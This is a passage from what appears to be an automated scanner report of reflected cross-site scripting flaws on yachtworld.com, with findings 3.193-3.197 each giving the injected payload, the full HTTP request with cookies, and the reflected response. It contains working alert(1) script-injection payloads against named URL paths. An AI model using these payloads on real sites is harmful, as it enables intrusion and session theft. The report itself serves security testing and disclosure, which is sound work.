F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:42 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type932cd"><script>alert(1)</script>309d892b808/260+Cruiser">
...[SNIP]...

3.193. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Albin/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed9f"><a>631eb687d93 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Albin5ed9f"><a>631eb687d93/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Albin5ed9f"><a>631eb687d93/A-1">
...[SNIP]...

3.194. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Albin/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2533"><script>alert(1)</script>6e8700b67c6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Albin/1c2533"><script>alert(1)</script>6e8700b67c6 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:56 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Albin/1c2533"><script>alert(1)</script>6e8700b67c6/A-1">
...[SNIP]...

3.195. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bayliner/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c60a0"><a>b2f99649883 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typec60a0"><a>b2f99649883/Bayliner/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:37 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typec60a0"><a>b2f99649883/Bayliner/1">
...[SNIP]...

3.196. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bayliner/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f037"><a>354b06200d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Bayliner3f037"><a>354b06200d2/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Bayliner3f037"><a>354b06200d2/A-1">
...[SNIP]...

3.197. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bayliner/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a64"><script>alert(1)</script>1f1925a738a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Bayliner/159a64"><script>alert(1)</script>1f1925a738a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 